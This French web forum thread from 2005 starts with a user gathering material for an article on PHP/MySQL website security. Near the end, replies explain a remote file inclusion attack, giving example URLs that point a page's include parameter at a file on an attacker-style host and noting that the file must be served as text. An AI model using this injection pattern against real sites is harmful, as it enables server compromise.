Sécuriser un site !

Répondre
Lefounard
le 12/04/2005 à 16:17
Lefounard
Bonjour,
Voila je dois rediger un texte sur la sécurité d'un site web : je pensais aborder l'aspect protection technique et aussi les erreurs a ne pas commettre : comme comble les differentes failles :
J'ai essayer d'orienter mes recherches j'ai commencai avec ces mots clés : htaccess, sessions, cookies et pour les failles : xss, SQL injection , include, logs apaches . Merci de m'indiquer d'autre methode pour protèger son site , ou d'autres failles assez répendus sur le net et spécifique a php/mysql.
Merci de votre Aide,
Ciao,
I am singing in the rain , I am happy again !!
LA GLOBULE
le 12/04/2005 à 16:28
LA GLOBULE
95% des problèmes de sécurité sont dus au cerveau qui se trouve entre le clavier et la chaise.

Il n'y a pas vraiment de failles spécifiques à PHP / MySQL mais juste des failles dues à des erreurs de conception.
agilis
le 17/04/2005 à 19:04
agilis
Quand t'aura fini, tu pourra filer l'adresse de ton article?
merci beaucoup!
Merci à tous!! agilis...
Lefounard
le 18/04/2005 à 03:49
Lefounard
pas de prob mais le prob c'est qu'il sera assez general, vu que je m'adresse a des personnes ayant jamais toucher au php et peut-etre a un ordinateur (lol ca serait etonnant pour des scientifique en ces temps !) , mais je peux te filer aussi mes sources ou sont trés bien détailler les failles les plus courantes en php ! ;)
Ciao,
I am singing in the rain , I am happy again !!
LA GLOBULE
le 18/04/2005 à 11:41
LA GLOBULE
Mais il n'y a pas de "failles courantes en PHP" !!!

La faille, c'est le programmeur...
Lefounard
le 18/04/2005 à 13:22
Lefounard
c'est vrai, donc pour corriger :"les failles les plus courament commises en php" , lol
Ciao,
I am singing in the rain , I am happy again !!
agilis
le 18/04/2005 à 17:10
agilis
En gros: "celles que je commait" lol

Oui je veux bien tes sources car c'est mon gros problèmes, c'est de sécuriser mes sites. Merci beaucoup!
Merci à tous!! agilis...
Jeanlepail
le 28/05/2005 à 17:52
Jeanlepail
yen a un grosse grosse failles ! c la faille include ! elle est presente dans ce genre de URl


http://www.site.com/page.php?affiche=http://www.google.com example et d site comme sa yen a plein alors un mechant hacker ki sy connai en php fera un page en PHP ki block le server et la metera sur son free (ex: hacker.free.fr/hack.php)
alors il retournera sur http://www.site.com/page.php?affiche=http://hacker.free.fr/hack.php

et hop site.com sera blocker !!!! dommage !
:)
bibi
le 30/05/2005 à 09:49
bibi
non, comme expliqué sur le site de frédéric bouchery, il devra le mettre en txt car si c'est en php, il sera interprété sur le server hacker.free.fr ;)
commit suicide
Répondre

Ecrire un message

Votre message vient d'être créé avec succès.
LoadingChargement en cours